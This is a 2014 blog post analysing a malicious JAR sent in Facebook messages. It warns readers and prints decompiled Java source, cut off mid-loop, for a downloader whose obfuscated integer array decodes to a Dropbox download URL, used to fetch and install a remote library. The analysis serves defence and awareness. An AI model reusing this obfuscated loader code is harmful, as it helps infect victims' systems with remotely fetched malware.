Skip to main content

Posts

Showing posts from May, 2014

Malware Analysis of Malicious Facebook Message

If recently  you have received a message like the one shown below, lol and zip attached with it then please do not try to open the jar file inside it.



So what this jar file contains??
Its a code that downloads the dynamic loadable library from internet and install it in system.Lets have a look at the source code of jar file which i decompiled .


import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.io.PrintStream;
import java.net.HttpURLConnection;
import java.net.URI;
import java.net.URL;
import java.nio.file.CopyOption;
import java.nio.file.Files;
import java.nio.file.Paths;

public class IMG_00111
{
  public static String XJJXMWJJQDBIAEHVEBZ()
  {
    int[] arrayOfInt = { 104, 116, 116, 112, 115, 58, 47, 47, 100, 108, 46, 100, 114, 111, 112, 98, 111, 120, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 115, 47 };

    StringBuilder localStringBuilder = new StringBuilder(arrayOfInt.length);
    for (int i = 0; i < arrayOfInt.length; i+…